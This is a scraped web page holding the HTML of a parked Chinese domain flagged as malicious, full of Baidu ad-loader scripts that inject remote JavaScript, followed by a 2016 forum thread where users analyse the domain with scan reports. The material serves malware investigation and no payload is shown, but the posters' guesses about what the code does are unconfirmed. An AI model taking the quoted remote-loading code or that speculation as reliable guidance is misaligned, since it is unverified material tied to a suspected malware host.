src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div class="clearfix"></div></div></div><div class="layout"><div class="mt20"><div class="fl"><!--u2578908#pd.dopa.com.cn#首页-4p左橱窗广告创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578908";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"300",rsi1:"250",pat:"17",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"1",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"",rss2:"#000000",titSU:"0"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div class="fl"><!--u2578918#pd.dopa.com.cn#首页-4p图片广告1创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578918";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"300",rsi1:"250",pat:"6",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"1",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"",rss2:"#000000",titSU:"0",ptbg:"90",piw:"130",pih:"90",ptp:"0"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div class="fl"><!--u2578924#pd.dopa.com.cn#首页-4p图片广告2创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578924";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"300",rsi1:"250",pat:"6",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"1",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"",rss2:"#000000",titSU:"0",ptbg:"90",piw:"130",pih:"90",ptp:"0"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div class="fl"><!--u2578929#pd.dopa.com.cn#首页-4p右橱窗广告创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578929";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"300",rsi1:"250",pat:"17",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"1",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"",rss2:"#000000",titSU:"0"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div class="clearfix"></div></div></div><div class="layout"><div class="mt20"><div class="fl"style="width:280px;"><div style="margin-left:15px;"><!--u2578989#pd.dopa.com.cn#首页-4p搜索推荐右边图文广告250*250创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578989";</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div></div><div class="fl"style="width:640px;"><!--u2578996#pd.dopa.com.cn#首页-4p搜索推荐--><script type="BAIDU_HH">{di:"u2578996",fixed_tpl:"1",type:"pageembed",version:"110",rsi0:"640",rsi1:"60"}</script><script>if(typeof BAIDU_SS_HHRUN!='function'){with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://su.bdimg.com/static/dspui/js/ls.js?v='+~(-new Date()/5600e5)]}else{BAIDU_SS_HHRUN()}</script><!--u2582973#pd.dopa.com.cn-底部搜索下图文广告640*190创建于2016-03-31--><script type="text/javascript">var cpro_id="u2582973";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"640",rsi1:"190",pat:"1",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"1",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"14",rss2:"#000000",titSU:"0",tft:"0",tlt:"1",ptbg:"90",piw:"0",pih:"0",ptp:"1"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div class="fl"style="width:280px;"><div style="margin-left:15px;"><!--u2578983#pd.dopa.com.cn#首页-4p搜索推荐左边图片广告250*250创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578983";</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div></div><div class="clear"></div></div></div></div><div class="clearfix"></div><div id="footer"><div class="footer-line"></div><div class="footer-cont"><div class="footer-detail"><div style="width:150px; margin:auto; height: 35px; background-color: #f60;text-align:center;"><a style="font-weight: bold; line-height: 35px; font-size:16px; color:#fff;"href="http://www.yumi.com/domain/ntkrnlpa.cn"target="_blank">委托购买此域名</a></div></div><div class="footer-detail copyright">Copyright©2016ntkrnlpa.cn.all rights reserved.</div></div></div><div class="container"style=" display:none; text-align:center; color:#999999; line-height:45px;"><div class="clearfix"></div>Copyright©2016 ntkrnlpa.cn All Rights Reserved</div></body></html><script>
var _hmt = _hmt || [];
(function() {
var hm = document.createElement("script");
hm.src = "//hm.baidu.com/hm.js?3479a5f75a570881e9ca33f4e0015f8b";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(hm, s);
})();
</script><span style="display:none;">80349000:2016-04-23 18:44:00</span>
Domain parking: » domaingang.com/domain-ne ··· pamming/(Mentioned this is 2014.) » sitecheck.sucuri.net/res ··· a.cn/rc/ | | dave Premium Member join:2000-05-04 not in ohio |
dave to Mike
Premium Member
2016-Apr-23 10:01 pm
to Mike
Any other references to this problem?
I'm thinking I ought to alert my dentist to this (mostly as an act of self-protection) and while your analysis is good enough for me, I'm wondering if there was some sort of more official report on this I should use.
Basically, I'm supposing that the response to me will be of the form "who sez so?". I'd probably do the same in her position. | | norwegian Premium Member join:2005-02-15 Outback 1 edit |
norwegian
Premium Member
2016-Apr-23 10:39 pm
It's a bit hard to clarify and the domain parking host might have a little to do with it and some url scans warn yet this scan it says some of the sites I've checked at are fine with it. pd.dopa.com.cn cpro.baidustatic.com Baidu.com Baidustatic.com su.bdimg.com Yumi.com And hence why this url scan says some of the listed url checks above are clean but as you see in the images previously posted they are picking up something. Edit: A better record of the url: » urlquery.net/report.php? ··· 64784717 | | trparky Premium Member join:2000-05-24 Cleveland, OH |
to Mike
How the hell did this pass quality control? | | SnowyLock him up!!! Premium Member join:2003-04-05 Kailua, HI
6 recommendations |
Snowy
Premium Member
2016-Apr-23 11:02 pm
said by trparky:How the hell did this pass quality control? 1. The drive fit the USB port. 2. The expected content was present/properly formatted. Having confirmed that what could possibly go wrong? They obviously put more effort into proof reading than security. | |
2 recommendations |
to Mike
Well, I tried to download the payload using Wget, got a "Malicious website blocked!". I have a DNS proxy server, and I send the .cn , .fm and .ru urls to Norton's ConnectSafe which blocks this domain. I think I'll code a few more overseas domains over to Nortons. My other thought is, there is that "badusb" defect. That's why I'm wary now on plugging in any new USB device. I'd be interested in a USB card I could add to the PCIe slot that takes a hardened approach to USB, just for these kinds of situations. | | Bill_MIBill In Michigan MVM join:2001-01-03 Royal Oak, MI 2 edits |
I think the original post is responsible for Avast alarms but pulling this one anyway. | | SipSizzurpFo' Shizzle Premium Member join:2005-12-28 Houston, TX
2 recommendations |
to Mike
Looks like this has been around for awhile. I Googled the entire iFrame line and get 600 hits on Goolge. One was this coding forum talking about the same iFrame back in 2009. https://www.namepros.com/threads/check-your-web-pages-again.540690/
Word Press warning from 4 years ago. https://wordpress.org/support/topic/a-virus-warning-to-visitors
I'm running deep freeze and am not afraid of viruses. What should I look for at the infected page ? | | SipSizzurp |
If I did get an infection there was no obvious clue. Here is the main page which has a lot of interesting links. Then screen shots from 3 of the linked pages. Chrome translated some of the stuff. Maybe I'll get lucky and find some porn in there..... | | norwegian Premium Member join:2005-02-15 Outback |
In the urlquery link there is an upload function at the end for static.flv.uuzuonline.com? Looking up Virus total shows a few malware examples utilizing the domain all from this year? » www.virustotal.com/en/do ··· rmation/I did notice though in the code I posted the first thing was to check for versions of IE so maybe there is a function that works once a weak version of IE is detected? | | therube join:2004-11-11 Randallstown, MD |
to Mike
| |
|